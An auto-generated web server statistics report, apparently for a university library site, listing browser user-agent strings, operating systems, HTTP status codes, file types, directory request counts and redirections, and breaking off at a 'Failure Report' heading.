290249Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
289272Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
288270Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 (.NET CLR 3.5.30729)
288279Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
287269Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
2870Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/412 (KHTML, like Gecko) Safari/YY xxx
287287Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.0.1; .NET CLR 1.0.3705)
286252Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20061023 SUSE/2.0.0.2-1.1 Firefox/2.0.0.2
285281Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
284282Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
284272Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; BO1IE8_v1;ENUS)
283268Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
283255Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4
283248Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)
281263Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GoogleT5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
280266Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/523.15.1 (KHTML, like Gecko) Version/3.0.4 Safari/523.15
280260Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
280262Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
279273Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MDDR; InfoPath.2)
279263Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)
278270Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Tablet PC 2.0; .NET CLR 1.1.4322)
278254Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
278251Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9
277245TurnitinBot/2.0 http://www.turnitin.com/robot/crawlerinfo.html
276149Mozilla/2.0 (compatible; Ask Jeeves/Teoma)
275241Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22
275268Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0) Gecko/20100101 Firefox/4.0
275271Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20050729 Netscape/8.0.3.3
275253Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16
275246Mozilla/5.0 (Linux; U; Android 2.1-update1; en-us; T-Mobile_Espresso Build/ERE27) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17
274274NutchCVS/0.8-dev (Nutch; http://lucene.apache.org/nutch/bot.html; nutch-agent@lucene.apache.org)
274274Python-webchecker/50851
273272Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)
273268Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.0.1; .NET CLR 1.1.4322)
273273Teemer (NetSeer, Inc. is a Los Angeles based Internet startup company.; http://www.netseer.com/crawler.html; crawler@netseer.com)
273241yacybot (amd64 Linux 2.6.22-14-generic; java 1.5.0_13; GMT+01:00/en) http://yacy.net/bot.html
271259Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.2)
271271Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.2) Gecko/20021120 Netscape/7.01
270270Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; FunWebProducts; .NET CLR 1.1.4322)
270258Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 (.NET CLR 3.5.30729)
270252Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
269269Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6
268264Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
267243Mozilla/5.0 (Linux; U; Android 1.5; en-us; MB200 Build/CUPCAKE) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
266266Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01
266263Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10
266266Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2)
266187LG-GW370/V10c; Mozilla/5.0 (Profile/MIDP-2.0 Configuration/CLDC-1.1; Opera Mini/att/4.2.17086; U; en) Opera 9.50
265262Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8.1 (KHTML, like Gecko) Safari/312.6
265229CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)
264255Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
264264HMSE_Robot
264263Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050920 Firefox/1.0.7 SUSE/1.0.7-0.1
263262Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
263263Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
263258Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.13) Gecko/20100914 Firefox/3.5.13 ( .NET CLR 3.5.30729)
263198Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0
263262Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDR; .NET4.0C; InfoPath.3)
262261ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)
262258Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; SV1)
261235Snoopy v1.2.3
260259Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
259237Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)
259259veoh-\xe2\xb8\xb3\xe2\xb8\xb40 service (NT 5.1; IE 7.0.5730.11; en-US Windows)
259248Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)
258254Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB0.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
257257Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; .NET CLR 3.0.30729)
257236Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDR; InfoPath.2; Tablet PC 2.0)
256246Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30)
256247Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
256248Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
255220Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)
255251Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.3)
255249Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ( .NET CLR 3.5.30729)
255252Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
254241Baiduspider+(+http://help.baidu.jp/system/05.html)
254245Mozilla/5.0 (Linux; U; Android 2.1-update1; en-us; SCH-I500 Build/ECLAIR) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17
253253GeoHasher/Nutch-1.0 (GeoHasher Web Search Engine; geohasher.gotdns.org; geo_hasher at yahoo * com)
253253Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; yie6_SBC; YPC 3.0.0)
253253Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SearchToolbar 1.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
252251Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061023 SUSE/2.0-30 Firefox/2.0
252245Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9
252222Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.50727; .NET CLR 3.0.30729)
251245Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.0; .NET CLR 1.1.4322)
251232Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)
251250Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322)
250230Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729)
250249Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
389865367335[not listed: 28,182 browsers]

Browser Summary

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the vendors of visitors' browsers.

Listing browsers with at least 250 requests, sorted by the number of requests.

no.reqspagesbrowser
113220081284421MSIE
2357136329423Netscape (compatible)
3216092199074Firefox
48947883942Safari
58277176811msnbot
62795927887Baiduspider+(+http:
72108620865Java
81417313592Googlebot
91291411915Mozilla
101291412611msnbot-media
111280411690FAST Enterprise Crawler 6
121178111582Netscape
131129110844noxtrumbot
1471317131Apple-PubSub
1563405544Yandex
1654085408Feedfetcher-Google; (+http:
1749364815Opera
1845544335Python-webchecker
1941794085ichiro
2040373783findfiles.net
2139223922libwww-perl
2239143741Jyxobot
2336603469FAST MetaWeb Crawler (helpdesk at fastsearch dot com)
2427332471Gigabot
2526432421FAST-WebCrawler
2624502450Sosospider+(+http:
2723372191TurnitinBot
2822792261ia_archiver
2921002087psbot
3019531626IRP_edu_bot
3118341689ConveraCrawler
3218331827MJ12bot
3317481695Sogou web spider
3416891689bzBot
3515091509WebAlta Crawler
3614561412DoCoMo
3714421430W3C-checklink
3811661165Atrax Solutions atraxbot
391030957Accoona-AI-Agent
4010232Googlebot-Image
4110191016Speedy Spider (http:
42980980Internet Explorer 6.0
43956955OmniExplorer_Bot
44924902NutchCVS
45866866Knight
46825820panscient.com
47820820AppleSyndication
48819812bot
49781781RedBot
50754718woriobot (+http:
51750750psycheclone
52728727UbiCrawler
53627627voyager
54604604SBIder
55594594CamontSpider
56590532CazoodleBot
57570570WhatsUp Professional
58563563firefox
59551551findlinks
60539468yacybot (i386 Linux 2.6.22-14-generic; java 1.5.0_13; GMT+01:00
61524523MSR-ISRCCrawler
62519488egothor
63466465Konqueror
64455455Cityreview Robot (+http:
65446446Speedy Spider (Entireweb; Beta
66442426websucker
67436436ColdFusion
68420370education portal
69417417larbin_2.6.3 atat@cs.bilkent.edu.tr
70411409DotBot
71402402LexxeBot
72387328yacybot (sciencenet
73383383disco
74373303LTI
75372372Toata dragostea mea pentru iEdi
76359359larbin_2.6.3 larbin2.6.3@unspecified.mail
77349348Nutraspace
78338314yacybot (i386 Linux 2.6.22-14-generic; java 1.5.0_13; Europe
79336336FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)
80334253Opera Mini
81329329Yeti
82311311dragonfly(ebingbong@playstarmusic.com)
83304259yacybot (i386 Linux 2.4.27-3-686-smp; java 1.5.0_07; MET
84294294ilial
85284274BlackBerry8530
86273273Teemer (NetSeer, Inc. is a Los Angeles based Internet startup company.; http:
87273241yacybot (amd64 Linux 2.6.22-14-generic; java 1.5.0_13; GMT+01:00
88271271Shim-Crawler(Mozilla-compatible; http:
89264264HMSE_Robot
90262261ia_archiver (+http:
91261235Snoopy v1.2.3
92259259sproose
93259259veoh-\xe2\xb8\xb3\xe2\xb8\xb40 service (NT 5.1; IE 7.0.5730.11; en-US Windows)
94253253GeoHasher
 1583815020[not listed: 954 browsers]

Operating System Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the operating systems used by visitors.

Listing operating systems with at least 250 requests, sorted by the number of requests.

no.reqspagesOS
115625141507465Windows
 12449061207605  Windows XP
 235121219553  Unknown Windows
 5169950509  Windows 2000
 1483814278  Windows 98
 52165117  Windows ME
 47004497  Windows Server 2003
 44104309  Windows NT
 813795  Windows 95
 744735  Windows CE
2660564618586OS unknown
36785264286Macintosh
42321020404Unix
 2312420318  Linux
 337323[not listed: 7 OS's]

Status Code Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the HTTP status codes of all requests.

Listing status codes with at least 250 requests, sorted by the number of requests.

reqsstatus code
2075333200 OK
323054404 Document not found
229122304 Not modified since last retrieval
43155301 Document moved permanently
23766206 Partial content
15664403 Access forbidden
2117401 Authentication required
1018500 Internal server error
539400 Bad request
462302 Document found elsewhere
290405 Method not allowed
254501 Request type not supported
18[not listed: 4 status codes]

File Size Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the sizes of files.

sizereqs%bytes
0181676 
1B- 10B1394 
11B- 100B490 
101B- 1kB75063 0.04%
1kB- 10kB756128 9.06%
10kB-100kB127198457.38%
100kB- 1MB4007113.01%
1MB- 10MB1343 5.12%
10MB-100MB22 1.85%
100MB- 1GB5013.55%

File Type Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the extensions of files.

Listing extensions with at least 250 requests, sorted by the number of requests.

reqs%bytesextension
132271439.49%[directories]
41937722.62%.py
238397 5.26%.html [Hypertext Markup Language]
183626 4.72%.php [PHP]
5729521.14%.pdf [Adobe Portable Document Format]
25558 0.16%.gif [GIF graphics]
24656 0.28%.xml [XML Data]
23331 0.59%.shtml [Server-parsed HTML]
10123 0.11%.htm [Hypertext Markup Language]
8127 0.65%.jpg [JPEG graphics]
5155 0.04%.css [Cascading Style Sheets]
2551 0.21%.png [PNG graphics]
1574 0.10%.xls [Microsoft Excel document]
1367 0.05%[no extension]
1234 0.01%.js [JavaScript code]
969 0.04%.xsl [XML Stylesheet]
523 0.65%.ppt [Microsoft PowerPoint document]
415 0.25%.swf [Macromedia Flash files]
286 0.12%.JPG
940 3.51%[not listed: 34 extensions]

Directory Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the directories from which files were requested. (The figures for each directory include all of its subdirectories.)

Listing directories with at least 250 requests, sorted by the number of requests.

reqs%bytesdirectory
87243929.73%[root directory]
41911222.61%/cgi-bin/
35409819.12%  /cgi-bin/eresources/
50783 3.17%  /cgi-bin/directory/
9009 0.21%  /cgi-bin/a2z/
3361 0.05%  /cgi-bin/AccessServices/
1185 0.05%  /cgi-bin/mediaproductions/
346   /cgi-bin/ill/
159817 3.94%/eresources/
4072 0.20%  /eresources/ebooks/
792 0.02%  /eresources/databases/
123740 3.88%/lisps/
31674 0.65%  /lisps/circulation/
27434 1.90%  /lisps/access/
22800 0.48%  /lisps/govinfo/
11545 0.22%  /lisps/ris/
5949 0.12%  /lisps/erc/
4608 0.11%  /lisps/music/
3479 0.08%  /lisps/hours/
2734 0.06%  /lisps/locations/
71756 1.93%/guides/
23939 0.78%  /guides/subjects/
1192 0.03%  /guides/grants/
639 0.05%  /guides/nguides/
50898 0.81%/finding/
32574 0.43%  /finding/databases/
5158 0.09%  /finding/articles/
4097 0.09%  /finding/books/
3102 0.06%  /finding/journals/
1497 0.04%  /finding/media/
1045 0.03%  /finding/music/
817 0.02%  /finding/magazines/
261 0.01%  /finding/videos/
41994 2.86%/news/
1726 1.91%  /news/20060101/
39504 1.55%/elearning/
14287 0.09%  /elearning/images/
6698 1.18%  /elearning/documents/
31093 0.74%/catalogs/
1127 0.03%  /catalogs/regional.php/
1127 0.03%  /catalogs/world.php/
27661 0.61%/helpcenter/
18874 0.44%  /helpcenter/desks/
27659 0.95%/digitallibraries/
17254 0.67%  /digitallibraries/csuhistory/
2027 0.05%  /digitallibraries/balkin/
25153 0.51%/directory/
24525 0.83%/journals/
22658 0.90%/schedules/
1081 0.07%  /schedules/index.php/
20610 0.57%/lisas/
15431 0.34%  /lisas/positions/
19326 0.54%/maps/
1454 0.03%  /maps/spaces/
18806 0.79%/tutorials/
5265 0.07%  /tutorials/LiteratureResourceCenterTour_files/
18064 2.44%/tlr/
8339 0.17%  /tlr/mediaproductions/
5278 0.10%  /tlr/mediaservices/
333 0.01%  /tlr/multimediaservices/
17393 0.40%/internet/
16512 0.42%/organization/
4180 0.10%  /organization/charts_files/
3063 0.09%  /organization/mission/
749 0.01%  /organization/LISTSOrgChart2009_files/
14304 0.14%/csit/
5501 0.03%  /csit/nf/
2597 0.04%  /csit/module1/
2208 0.03%  /csit/intro/
1325 0.01%  /csit/module2/
1029 0.01%  /csit/module3/
1250413.40%/policies/
1649 0.11%  /policies/travel/
644 0.04%  /policies/purchasing/
408 0.03%  /policies/hiring/
11882 0.77%/collections/
7876 0.62%  /collections/pincham/
917 0.02%  /collections/oc/
819 0.02%  /collections/archival/
778 0.08%  /collections/digital/
11277 0.24%/using/
4072 0.08%  /using/databases/
1886 0.04%  /using/journals/
1486 0.04%  /using/books/
1432 0.03%  /using/articles/
819 0.02%  /using/music/
769 0.02%  /using/media/
577 0.01%  /using/magazines/
10090 0.96%/acquisitions/
9578 0.17%/units/
9467 0.18%/hours/
8879 0.17%/lists/
8274 0.18%/ASRS/
8101 0.37%/lisasc/
1247 0.08%  /lisasc/findingaids/
740 0.09%  /lisasc/recordsmanagement/
668 0.02%  /lisasc/history/
622 0.02%  /lisasc/archives/
579 0.01%  /lisasc/specialcollections/
7791 0.15%/copyright/
7688 0.16%/use/
7546 0.13%/disclaimer/
7100 0.13%/presentations/
4156 0.04%  /presentations/Trying2SaveMore_files/
2727 0.08%  /presentations/HiddenTreasures_files/
6983 0.26%/friends/
5733 0.43%/csuebooks/
5582 0.42%/asc/
2375 0.21%  /asc/findingaids/
773 0.15%  /asc/recordsmanagement/
5448 0.11%/find/
5302 0.13%/vision/
5277 0.11%/lisars/
624 0.02%  /lisars/hours/
616 0.01%  /lisars/locations/
5247 0.12%/obtaining/
1011 0.02%  /obtaining/books/
847 0.02%  /obtaining/journals/
840 0.02%  /obtaining/articles/
782 0.02%  /obtaining/music/
737 0.02%  /obtaining/media/
603 0.01%  /obtaining/magazines/
5109 0.23%/pap/
795 0.05%  /pap/travel/
633 0.04%  /pap/purchasing/
300 0.02%  /pap/hiring/
4645 0.07%/sg/
4618 0.10%/returning/
852 0.02%  /returning/books/
772 0.02%  /returning/music/
756 0.02%  /returning/articles/
747 0.02%  /returning/journals/
645 0.01%  /returning/magazines/
434 0.01%  /returning/media/
4589 0.10%/cr/
4262 0.19%/books/
2422 0.14%  /books/ebooks/
370 0.01%  /books/printed/
4235 0.10%/reference/
2505 0.05%  /reference/orr/
323 0.01%  /reference/resources/
4233 0.13%/ill/
4154 0.06%/departments/
4154 0.06%  /departments/LISMS/
4114 0.10%/printing/
1362 0.03%  /printing/articles/
804 0.02%  /printing/books/
784 0.02%  /printing/journals/
736 0.02%  /printing/music/
3592 0.07%/ask/
3552 0.07%/request/
3398 0.07%  /request/instruction/
3399 0.09%/services/
3397 0.05%/forstudents/
3393 0.04%/~staffdev/
1092 0.02%  /~staffdev/lists/
812   /~staffdev/images/
444   /~staffdev/styles/
282   /~staffdev/scripts/
3282 0.08%/government/
3113 0.10%/ilbc/
2260 0.10%  /ilbc/images/
2781 0.06%/articles/
2611 0.08%/circ/
2000 0.06%  /circ/policies/
2290 0.06%/is/
2128 0.04%/aboutus/
1946 0.04%/centers/
1928 0.04%/mission/
1603 0.04%/periodicals/
696 0.02%  /periodicals/journals/
584 0.01%  /periodicals/magazines/
1572 0.06%/erc/
1560 0.06%/sguides/
1436 0.04%/music/
1411 0.03%/databases/
1225 0.03%/callnumbers/
1163 0.02%/rsg/
1058 0.02%/forstaff/
972 /exhibits/
960 0.13%/ilpp/
949 0.02%/newspapers/
894 0.02%/ctre/
894 0.03%/x80@/
894 0.03%  /x80@/x01/
892 0.02%/rover/
828 0.02%/videos/
819 0.02%/aboutresearch/
795 0.05%http://
685 0.04%/Templates/
637 0.01%/forfaculty/
566 0.02%/as/
529 0.01%/ILBC/
525 0.01%/new/
483 0.13%/ephemera/
419 0.01%/lis/
411 0.01%/~tour/
265 0.01%  /~tour/images/
410 0.01%/aaj/
388 0.01%/events/
383 0.01%/er/
380 /forvisitors/
374 0.01%/contactus/
366 0.03%/publicprograms/
276 0.01%/bam/
2211 1.44%[not listed: 45 directories]

Redirection Report

(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)

This report lists the files that caused requests to be redirected to another file. (Usually directories with the final slash missing, or CGI scripts that forced redirections.)

Listing files with at least 250 redirected requests, sorted by the number of redirected requests.

reqsfile
3680/disclaimer
3614/use
3529/helpcenter
3504/copyright
3248/digitallibraries
2469/news
2244/lisps/access/reserves
1799/departments/LISMS/mediaservices
1132/lists
760/schedules
625/maps
583/finding/journals
540/exhibits
536/csuebooks
524/lisps/circulation
497/directory
477/guides
468/lisas
461/lisasc
460/friends
460/catalogs
445/lisps
440/blog
388/tutorials
375/internet
375/eresources
360/tlr
314/wiki
307/lisps/govinfo
290/units
287/lisars
267/lisps/ris
255/helpcenter/desks
252/finding/databases
7652[not listed: 225 files]

Failure Report

